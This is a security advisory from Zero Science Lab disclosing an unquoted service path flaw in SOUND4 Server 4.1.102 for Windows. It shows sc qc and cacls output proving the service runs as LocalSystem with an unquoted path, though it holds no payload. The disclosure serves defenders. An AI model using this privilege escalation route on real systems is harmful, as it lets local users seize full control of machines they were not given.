<pre><code><br />SOUND4 Server Service 4.1.102 Local Privilege Escalation<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: 4.1.102<br /><br />Summary: SOUND4 Windows Server Service.<br /><br />Desc: The application suffers from an unquoted search path issue impacting<br />the service 'SOUND4 Server' for Windows. This could potentially allow an<br />authorized but non-privileged local user to execute arbitrary code with<br />elevated privileges on the system. A successful attempt would require the<br />local user to be able to insert their code in the system root path undetected<br />by the OS or other security applications where it could potentially be executed<br />during application startup or reboot. If successful, the local user's code<br />would execute with the elevated privileges of the application.<br /><br />Tested on: Windows 10 Home 64 bit (build 9200)<br /> SOUND4 Server v4.1.102<br /> SOUND4 Remote Control v4.3.17<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5721<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5721.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />C:\>sc qc "SOUND4 Server"<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: SOUND4 Server<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files\SOUND4\Server\SOUND4 Server.exe --service<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : SOUND4 Server<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />C:\>cacls "C:\Program Files\SOUND4\Server\SOUND4 Server.exe"<br />C:\Program Files\SOUND4\Server\SOUND4 Server.exe NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Administrators:(ID)F<br /> BUILTIN\Users:(ID)R<br /> APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R<br /> APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R<br /><br /><br />C:\Program Files\SOUND4\Server>"SOUND4 Server.exe" -V<br />4.1.102<br /></code></pre>